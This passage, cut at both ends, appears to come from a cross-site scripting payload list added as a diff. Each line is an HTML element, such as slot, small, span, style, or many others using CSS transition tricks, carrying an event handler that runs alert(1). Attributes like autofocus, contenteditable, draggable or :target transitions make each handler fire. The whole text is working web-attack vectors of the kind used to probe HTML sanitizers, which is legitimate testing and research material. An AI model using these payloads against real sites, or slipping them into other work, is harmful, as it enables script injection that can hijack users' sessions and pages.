autofocus> +<slot id=x tabindex=1 onfocus=alert(1)></slot> +<slot id=x tabindex=1 onfocusin=alert(1)></slot> +<slot onbeforecopy="alert(1)" contenteditable>test</slot> +<slot onbeforecut="alert(1)" contenteditable>test</slot> +<slot onbeforepaste="alert(1)" contenteditable>test</slot> +<slot onblur=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onclick="alert(1)">test</slot> +<slot oncontextmenu="alert(1)">test</slot> +<slot oncopy="alert(1)" contenteditable>test</slot> +<slot oncut="alert(1)" contenteditable>test</slot> +<slot ondblclick="alert(1)">test</slot> +<slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onkeydown="alert(1)" contenteditable>test</slot> +<slot onkeypress="alert(1)" contenteditable>test</slot> +<slot onkeyup="alert(1)" contenteditable>test</slot> +<slot onmousedown="alert(1)">test</slot> +<slot onmouseenter="alert(1)">test</slot> +<slot onmouseleave="alert(1)">test</slot> +<slot onmousemove="alert(1)">test</slot> +<slot onmouseout="alert(1)">test</slot> +<slot onmouseover="alert(1)">test</slot> +<slot onmouseup="alert(1)">test</slot> +<slot onpaste="alert(1)" contenteditable>test</slot> +<small draggable="true" ondrag="alert(1)">test</small> +<small draggable="true" ondragend="alert(1)">test</small> +<small draggable="true" ondragenter="alert(1)">test</small> +<small draggable="true" ondragleave="alert(1)">test</small> +<small draggable="true" ondragstart="alert(1)">test</small> +<small id=x tabindex=1 onactivate=alert(1)></small> +<small id=x tabindex=1 onbeforeactivate=alert(1)></small> +<small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus> +<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus> +<small id=x tabindex=1 onfocus=alert(1)></small> +<small id=x tabindex=1 onfocusin=alert(1)></small> +<small onbeforecopy="alert(1)" contenteditable>test</small> +<small onbeforecut="alert(1)" contenteditable>test</small> +<small onbeforepaste="alert(1)" contenteditable>test</small> +<small onblur=alert(1) tabindex=1 id=x></small><input autofocus> +<small onclick="alert(1)">test</small> +<small oncontextmenu="alert(1)">test</small> +<small oncopy="alert(1)" contenteditable>test</small> +<small oncut="alert(1)" contenteditable>test</small> +<small ondblclick="alert(1)">test</small> +<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus> +<small onkeydown="alert(1)" contenteditable>test</small> +<small onkeypress="alert(1)" contenteditable>test</small> +<small onkeyup="alert(1)" contenteditable>test</small> +<small onmousedown="alert(1)">test</small> +<small onmouseenter="alert(1)">test</small> +<small onmouseleave="alert(1)">test</small> +<small onmousemove="alert(1)">test</small> +<small onmouseout="alert(1)">test</small> +<small onmouseover="alert(1)">test</small> +<small onmouseup="alert(1)">test</small> +<small onpaste="alert(1)" contenteditable>test</small> +<source draggable="true" ondrag="alert(1)">test</source> +<source draggable="true" ondragend="alert(1)">test</source> +<source draggable="true" ondragenter="alert(1)">test</source> +<source draggable="true" ondragleave="alert(1)">test</source> +<source draggable="true" ondragstart="alert(1)">test</source> +<source id=x tabindex=1 onactivate=alert(1)></source> +<source id=x tabindex=1 onbeforeactivate=alert(1)></source> +<source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus> +<source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus> +<source id=x tabindex=1 onfocus=alert(1)></source> +<source id=x tabindex=1 onfocusin=alert(1)></source> +<source onbeforecopy="alert(1)" contenteditable>test</source> +<source onbeforecut="alert(1)" contenteditable>test</source> +<source onbeforepaste="alert(1)" contenteditable>test</source> +<source onblur=alert(1) tabindex=1 id=x></source><input autofocus> +<source onclick="alert(1)">test</source> +<source oncontextmenu="alert(1)">test</source> +<source oncopy="alert(1)" contenteditable>test</source> +<source oncut="alert(1)" contenteditable>test</source> +<source ondblclick="alert(1)">test</source> +<source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus> +<source onkeydown="alert(1)" contenteditable>test</source> +<source onkeypress="alert(1)" contenteditable>test</source> +<source onkeyup="alert(1)" contenteditable>test</source> +<source onmousedown="alert(1)">test</source> +<source onmouseenter="alert(1)">test</source> +<source onmouseleave="alert(1)">test</source> +<source onmousemove="alert(1)">test</source> +<source onmouseout="alert(1)">test</source> +<source onmouseover="alert(1)">test</source> +<source onmouseup="alert(1)">test</source> +<source onpaste="alert(1)" contenteditable>test</source> +<spacer draggable="true" ondrag="alert(1)">test</spacer> +<spacer draggable="true" ondragend="alert(1)">test</spacer> +<spacer draggable="true" ondragenter="alert(1)">test</spacer> +<spacer draggable="true" ondragleave="alert(1)">test</spacer> +<spacer draggable="true" ondragstart="alert(1)">test</spacer> +<spacer id=x tabindex=1 onactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforeactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus> +<spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus> +<spacer id=x tabindex=1 onfocus=alert(1)></spacer> +<spacer id=x tabindex=1 onfocusin=alert(1)></spacer> +<spacer onbeforecopy="alert(1)" contenteditable>test</spacer> +<spacer onbeforecut="alert(1)" contenteditable>test</spacer> +<spacer onbeforepaste="alert(1)" contenteditable>test</spacer> +<spacer onblur=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onclick="alert(1)">test</spacer> +<spacer oncontextmenu="alert(1)">test</spacer> +<spacer oncopy="alert(1)" contenteditable>test</spacer> +<spacer oncut="alert(1)" contenteditable>test</spacer> +<spacer ondblclick="alert(1)">test</spacer> +<spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onkeydown="alert(1)" contenteditable>test</spacer> +<spacer onkeypress="alert(1)" contenteditable>test</spacer> +<spacer onkeyup="alert(1)" contenteditable>test</spacer> +<spacer onmousedown="alert(1)">test</spacer> +<spacer onmouseenter="alert(1)">test</spacer> +<spacer onmouseleave="alert(1)">test</spacer> +<spacer onmousemove="alert(1)">test</spacer> +<spacer onmouseout="alert(1)">test</spacer> +<spacer onmouseover="alert(1)">test</spacer> +<spacer onmouseup="alert(1)">test</spacer> +<spacer onpaste="alert(1)" contenteditable>test</spacer> +<span draggable="true" ondrag="alert(1)">test</span> +<span draggable="true" ondragend="alert(1)">test</span> +<span draggable="true" ondragenter="alert(1)">test</span> +<span draggable="true" ondragleave="alert(1)">test</span> +<span draggable="true" ondragstart="alert(1)">test</span> +<span id=x tabindex=1 onactivate=alert(1)></span> +<span id=x tabindex=1 onbeforeactivate=alert(1)></span> +<span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus> +<span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus> +<span id=x tabindex=1 onfocus=alert(1)></span> +<span id=x tabindex=1 onfocusin=alert(1)></span> +<span onbeforecopy="alert(1)" contenteditable>test</span> +<span onbeforecut="alert(1)" contenteditable>test</span> +<span onbeforepaste="alert(1)" contenteditable>test</span> +<span onblur=alert(1) tabindex=1 id=x></span><input autofocus> +<span onclick="alert(1)">test</span> +<span oncontextmenu="alert(1)">test</span> +<span oncopy="alert(1)" contenteditable>test</span> +<span oncut="alert(1)" contenteditable>test</span> +<span ondblclick="alert(1)">test</span> +<span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus> +<span onkeydown="alert(1)" contenteditable>test</span> +<span onkeypress="alert(1)" contenteditable>test</span> +<span onkeyup="alert(1)" contenteditable>test</span> +<span onmousedown="alert(1)">test</span> +<span onmouseenter="alert(1)">test</span> +<span onmouseleave="alert(1)">test</span> +<span onmousemove="alert(1)">test</span> +<span onmouseout="alert(1)">test</span> +<span onmouseover="alert(1)">test</span> +<span onmouseup="alert(1)">test</span> +<span onpaste="alert(1)" contenteditable>test</span> +<strike draggable="true" ondrag="alert(1)">test</strike> +<strike draggable="true" ondragend="alert(1)">test</strike> +<strike draggable="true" ondragenter="alert(1)">test</strike> +<strike draggable="true" ondragleave="alert(1)">test</strike> +<strike draggable="true" ondragstart="alert(1)">test</strike> +<strike id=x tabindex=1 onactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus> +<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus> +<strike id=x tabindex=1 onfocus=alert(1)></strike> +<strike id=x tabindex=1 onfocusin=alert(1)></strike> +<strike onbeforecopy="alert(1)" contenteditable>test</strike> +<strike onbeforecut="alert(1)" contenteditable>test</strike> +<strike onbeforepaste="alert(1)" contenteditable>test</strike> +<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onclick="alert(1)">test</strike> +<strike oncontextmenu="alert(1)">test</strike> +<strike oncopy="alert(1)" contenteditable>test</strike> +<strike oncut="alert(1)" contenteditable>test</strike> +<strike ondblclick="alert(1)">test</strike> +<strike onfocusout=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onkeydown="alert(1)" contenteditable>test</strike> +<strike onkeypress="alert(1)" contenteditable>test</strike> +<strike onkeyup="alert(1)" contenteditable>test</strike> +<strike onmousedown="alert(1)">test</strike> +<strike onmouseenter="alert(1)">test</strike> +<strike onmouseleave="alert(1)">test</strike> +<strike onmousemove="alert(1)">test</strike> +<strike onmouseout="alert(1)">test</strike> +<strike onmouseover="alert(1)">test</strike> +<strike onmouseup="alert(1)">test</strike> +<strike onpaste="alert(1)" contenteditable>test</strike> +<strong draggable="true" ondrag="alert(1)">test</strong> +<strong draggable="true" ondragend="alert(1)">test</strong> +<strong draggable="true" ondragenter="alert(1)">test</strong> +<strong draggable="true" ondragleave="alert(1)">test</strong> +<strong draggable="true" ondragstart="alert(1)">test</strong> +<strong id=x tabindex=1 onactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforeactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus> +<strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus> +<strong id=x tabindex=1 onfocus=alert(1)></strong> +<strong id=x tabindex=1 onfocusin=alert(1)></strong> +<strong onbeforecopy="alert(1)" contenteditable>test</strong> +<strong onbeforecut="alert(1)" contenteditable>test</strong> +<strong onbeforepaste="alert(1)" contenteditable>test</strong> +<strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onclick="alert(1)">test</strong> +<strong oncontextmenu="alert(1)">test</strong> +<strong oncopy="alert(1)" contenteditable>test</strong> +<strong oncut="alert(1)" contenteditable>test</strong> +<strong ondblclick="alert(1)">test</strong> +<strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onkeydown="alert(1)" contenteditable>test</strong> +<strong onkeypress="alert(1)" contenteditable>test</strong> +<strong onkeyup="alert(1)" contenteditable>test</strong> +<strong onmousedown="alert(1)">test</strong> +<strong onmouseenter="alert(1)">test</strong> +<strong onmouseleave="alert(1)">test</strong> +<strong onmousemove="alert(1)">test</strong> +<strong onmouseout="alert(1)">test</strong> +<strong onmouseover="alert(1)">test</strong> +<strong onmouseup="alert(1)">test</strong> +<strong onpaste="alert(1)" contenteditable>test</strong> +<style draggable="true" ondrag="alert(1)">test</style> +<style draggable="true" ondragend="alert(1)">test</style> +<style draggable="true" ondragenter="alert(1)">test</style> +<style draggable="true" ondragleave="alert(1)">test</style> +<style draggable="true" ondragstart="alert(1)">test</style> +<style id=x tabindex=1 onactivate=alert(1)></style> +<style id=x tabindex=1 onbeforeactivate=alert(1)></style> +<style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus> +<style id=x tabindex=1 ondeactivate=alert(1)></style><input id=y autofocus> +<style id=x tabindex=1 onfocus=alert(1)></style> +<style id=x tabindex=1 onfocusin=alert(1)></style> +<style onbeforecopy="alert(1)" contenteditable>test</style> +<style onbeforecut="alert(1)" contenteditable>test</style> +<style onbeforepaste="alert(1)" contenteditable>test</style> +<style onblur=alert(1) tabindex=1 id=x></style><input autofocus> +<style onclick="alert(1)">test</style> +<style oncontextmenu="alert(1)">test</style> +<style oncopy="alert(1)" contenteditable>test</style> +<style oncut="alert(1)" contenteditable>test</style> +<style ondblclick="alert(1)">test</style> +<style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus> +<style onkeydown="alert(1)" contenteditable>test</style> +<style onkeypress="alert(1)" contenteditable>test</style> +<style onkeyup="alert(1)" contenteditable>test</style> +<style onload=alert(1)></style> +<style onmousedown="alert(1)">test</style> +<style onmouseenter="alert(1)">test</style> +<style onmouseleave="alert(1)">test</style> +<style onmousemove="alert(1)">test</style> +<style onmouseout="alert(1)">test</style> +<style onmouseover="alert(1)">test</style> +<style onmouseup="alert(1)">test</style> +<style onpaste="alert(1)" contenteditable>test</style> +<style onreadystatechange=alert(1)></style> +<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a> +<style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></abbr> +<style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)></acronym> +<style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(1)></address> +<style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(1)></applet> +<style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(1)></area> +<style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(1)></article> +<style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(1)></aside> +<style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(1)></audio> +<style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(1)></b> +<style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(1)></base> +<style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)></basefont> +<style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdi> +<style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdo> +<style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)></bgsound> +<style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(1)></big> +<style>:target {color: red;}</style><blink id=x style="transition:color 10s" ontransitioncancel=alert(1)></blink> +<style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)></blockquote> +<style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(1)></body> +<style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(1)></br> +<style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(1)></button> +<style>:target {color: red;}</style><canvas id=x style="transition:color 10s" ontransitioncancel=alert(1)></canvas> +<style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(1)></caption> +<style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(1)></center> +<style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(1)></cite> +<style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(1)></code> +<style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(1)></col> +<style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></colgroup> +<style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(1)></command> +<style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(1)></content> +<style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(1)></data> +<style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)></datalist> +<style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(1)></dd> +<style>:target {color: red;}</style><del id=x style="transition:color 10s" ontransitioncancel=alert(1)></del> +<style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(1)></details> +<style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)></dfn> +<style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)></dialog> +<style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(1)></dir> +<style>:target {color: red;}</style><div id=x style="transition:color 10s" ontransitioncancel=alert(1)></div> +<style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(1)></dl> +<style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(1)></dt> +<style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(1)></element> +<style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(1)></em> +<style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(1)></embed> +<style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)></fieldset> +<style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)></figcaption> +<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(1)></figure> +<style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(1)></font> +<style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(1)></footer> +<style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(1)></form> +<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(1)></frame> +<style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)></frameset> +<style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)></h1> +<style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(1)></head> +<style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(1)></header> +<style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></hgroup> +<style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(1)></hr> +<style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(1)></html> +<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i> +<style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)></iframe> +<style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(1)></image> +<style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(1)></img> +<style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(1)></input> +<style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(1)></ins> +<style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)></isindex> +<style>:target {color: red;}</style><kbd id=x style="transition:color 10s" ontransitioncancel=alert(1)></kbd> +<style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)></keygen> +<style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(1)></label> +<style>:target {color: red;}</style><legend id=x style="transition:color 10s" ontransitioncancel=alert(1)></legend> +<style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(1)></li> +<style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(1)></link> +<style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(1)></listing> +<style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(1)></main> +<style>:target {color: red;}</style><map id=x style="transition:color 10s" ontransitioncancel=alert(1)></map> +<style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(1)></mark> +<style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)></marquee> +<style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(1)></menu> +<style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)></menuitem> +<style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(1)></meta> +<style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(1)></meter> +<style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)></multicol> +<style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(1)></nav> +<style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)></nextid> +<style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)></nobr> +<style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)></noembed> +<style>:target {color: red;}</style><noframes id=x style="transition:color 10s" ontransitioncancel=alert(1)></noframes> +<style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)></noscript> +<style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(1)></object> +<style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(1)></ol> +<style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></optgroup> +<style>:target {color: red;}</style><option id=x style="transition:color 10s" ontransitioncancel=alert(1)></option> +<style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(1)></output> +<style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(1)></p> +<style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(1)></param> +<style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(1)></picture> +<style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)></plaintext> +<style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(1)></pre> +<style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(1)></progress> +<style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(1)></q> +<style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(1)></rb> +<style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(1)></rp> +<style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(1)></rt> +<style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)></rtc> +<style>:target {color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)></ruby> +<style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(1)></s> +<style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(1)></samp> +<style>:target {color: red;}</style><script id=x style="transition:color 10s" ontransitioncancel=alert(1)></script> +<style>:target {color: red;}</style><section id=x style="transition:color 10s" ontransitioncancel=alert(1)></section> +<style>:target {color: red;}</style><select id=x style="transition:color 10s" ontransitioncancel=alert(1)></select> +<style>:target {color: red;}</style><shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)></shadow> +<style>:target {color: red;}</style><slot id=x style="transition:color 10s" ontransitioncancel=alert(1)></slot> +<style>:target {color: red;}</style><small id=x style="transition:color 10s" ontransitioncancel=alert(1)></small> +<style>:target {color: red;}</style><source id=x style="transition:color 10s" ontransitioncancel=alert(1)></source> +<style>:target {color: red;}</style><spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)></spacer> +<style>:target {color: red;}</style><span id=x style="transition:color 10s" ontransitioncancel=alert(1)></span> +<style>:target {color: red;}</style><strike id=x style="transition:color 10s" ontransitioncancel=alert(1)></strike> +<style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=alert(1)></strong> +<style>:target {color: red;}</style><style id=x style="transition:color 10s" ontransitioncancel=alert(1)></style> +<style>:target {color: red;}</style><sub id=x style="transition:color 10s" ontransitioncancel=alert(1)></sub> +<style>:target {color: red;}</style><summary id=x style="transition:color 10s" ontransitioncancel=alert(1)></summary> +<style>:target {color: red;}</style><sup id=x style="transition:color 10s" ontransitioncancel=alert(1)></sup> +<style>:target {color: red;}</style><svg id=x style="transition:color 10s" ontransitioncancel=alert(1)></svg> +<style>:target {color: red;}</style><table id=x style="transition:color 10s" ontransitioncancel=alert(1)></table> +<style>:target {color: red;}</style><tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)></tbody> +<style>:target {color: red;}</style><td id=x style="transition:color 10s" ontransitioncancel=alert(1)></td> +<style>:target {color: red;}</style><template id=x style="transition:color 10s" ontransitioncancel=alert(1)></template> +<style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)></textarea> +<style>:target {color: red;}</style><tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)></tfoot> +<style>:target {color: red;}</style><th id=x style="transition:color 10s" ontransitioncancel=alert(1)></th> +<style>:target {color: red;}</style><thead id=x style="transition:color 10s" ontransitioncancel=alert(1)></thead> +<style>:target {color: red;}</style><time id=x style="transition:color 10s" ontransitioncancel=alert(1)></time> +<style>:target {color: red;}</style><title id=x style="transition:color 10s" ontransitioncancel=alert(1)></title> +<style>:target {color: red;}</style><tr id=x style="transition:color 10s" ontransitioncancel=alert(1)></tr> +<style>:target {color: red;}</style><track id=x style="transition:color 10s" ontransitioncancel=alert(1)></track> +<style>:target {color: red;}</style><tt id=x style="transition:color 10s" ontransitioncancel=alert(1)></tt> +<style>:target {color: red;}</style><u id=x style="transition:color 10s" ontransitioncancel=alert(1)></u> +<style>:target {color: red;}</style><ul id=x style="transition:color 10s" ontransitioncancel=alert(1)></ul> +<style>:target {color: red;}</style><var id=x style="transition:color 10s" ontransitioncancel=alert(1)></var> +<style>:target {color: red;}</style><video id=x style="transition:color 10s" ontransitioncancel=alert(1)></video> +<style>:target {color: red;}</style><wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></wbr> +<style>:target {color: red;}</style><xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)></xmp> +<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a> +<style>:target {color:red;}</style><abbr id=x style="transition:color 1s" ontransitionend=alert(1)></abbr> +<style>:target {color:red;}</style><acronym id=x style="transition:color 1s" ontransitionend=alert(1)></acronym> +<style>:target {color:red;}</style><address id=x style="transition:color 1s" ontransitionend=alert(1)></address> +<style>:target {color:red;}</style><applet id=x style="transition:color 1s" ontransitionend=alert(1)></applet> +<style>:target {color:red;}</style><area id=x style="transition:color 1s" ontransitionend=alert(1)></area> +<style>:target {color:red;}</style><article id=x style="transition:color 1s" ontransitionend=alert(1)></article> +<style>:target {color:red;}</style><aside id=x style="transition:color 1s" ontransitionend=alert(1)></aside> +<style>:target {color:red;}</style><audio id=x style="transition:color 1s" ontransitionend=alert(1)></audio> +<style>:target {color:red;}</style><b id=x style="transition:color 1s" ontransitionend=alert(1)></b> +<style>:target {color:red;}</style><base id=x style="transition:color 1s" ontransitionend=alert(1)></base> +<style>:target {color:red;}</style><basefont id=x style="transition:color 1s" ontransitionend=alert(1)></basefont> +<style>:target {color:red;}</style><bdi id=x style="transition:color 1s" ontransitionend=alert(1)></bdi> +<style>:target {color:red;}</style><bdo id=x style="transition:color 1s" ontransitionend=alert(1)></bdo> +<style>:target {color:red;}</style><bgsound id=x style="transition:color 1s" ontransitionend=alert(1)></bgsound> +<style>:target {color:red;}</style><big id=x style="transition:color 1s" ontransitionend=alert(1)></big> +<style>:target {color:red;}</style><blink id=x style="transition:color 1s" ontransitionend=alert(1)></blink> +<style>:target {color:red;}</style><blockquote id=x style="transition:color 1s" ontransitionend=alert(1)></blockquote> +<style>:target {color:red;}</style><body id=x style="transition:color 1s" ontransitionend=alert(1)></body> +<style>:target {color:red;}</style><br id=x style="transition:color 1s" ontransitionend=alert(1)></br> +<style>:target {color:red;}</style><button id=x style="transition:color 1s" ontransitionend=alert(1)></button> +<style>:target {color:red;}</style><canvas id=x style="transition:color 1s" ontransitionend=alert(1)></canvas> +<style>:target {color:red;}</style><caption id=x style="transition:color 1s" ontransitionend=alert(1)></caption> +<style>:target {color:red;}</style><center id=x style="transition:color 1s" ontransitionend=alert(1)></center> +<style>:target {color:red;}</style><cite id=x style="transition:color 1s" ontransitionend=alert(1)></cite> +<style>:target {color:red;}</style><code id=x style="transition:color 1s" ontransitionend=alert(1)></code> +<style>:target {color:red;}</style><col id=x style="transition:color 1s" ontransitionend=alert(1)></col> +<style>:target {color:red;}</style><colgroup id=x style="transition:color 1s" ontransitionend=alert(1)></colgroup> +<style>:target {color:red;}</style><command id=x style="transition:color 1s" ontransitionend=alert(1)></command> +<style>:target {color:red;}</style><content id=x style="transition:color 1s" ontransitionend=alert(1)></content> +<style>:target {color:red;}</style><data id=x style="transition:color 1s" ontransitionend=alert(1)></data> +<style>:target {color:red;}</style><datalist id=x style="transition:color 1s" ontransitionend=alert(1)></datalist> +<style>:target {color:red;}</style><dd id=x style="transition:color 1s" ontransitionend=alert(1)></dd> +<style>:target {color:red;}</style><del id=x style="transition:color 1s" ontransitionend=alert(1)></del> +<style>:target {color:red;}</style><details id=x style="transition:color 1s" ontransitionend=alert(1)></details> +<style>:target {color:red;}</style><dfn id=x style="transition:color 1s" ontransitionend=alert(1)></dfn> +<style>:target {color:red;}</style><dialog id=x style="transition:color 1s" ontransitionend=alert(1)></dialog> +<style>:target {color:red;}</style><dir id=x style="transition:color 1s" ontransitionend=alert(1)></dir> +<style>:target {color:red;}</style><div id=x style="transition:color 1s" ontransitionend=alert(1)></div> +<style>:target {color:red;}</style><dl id=x style="transition:color 1s" ontransitionend=alert(1)></dl> +<style>:target {color:red;}</style><dt id=x style="transition:color 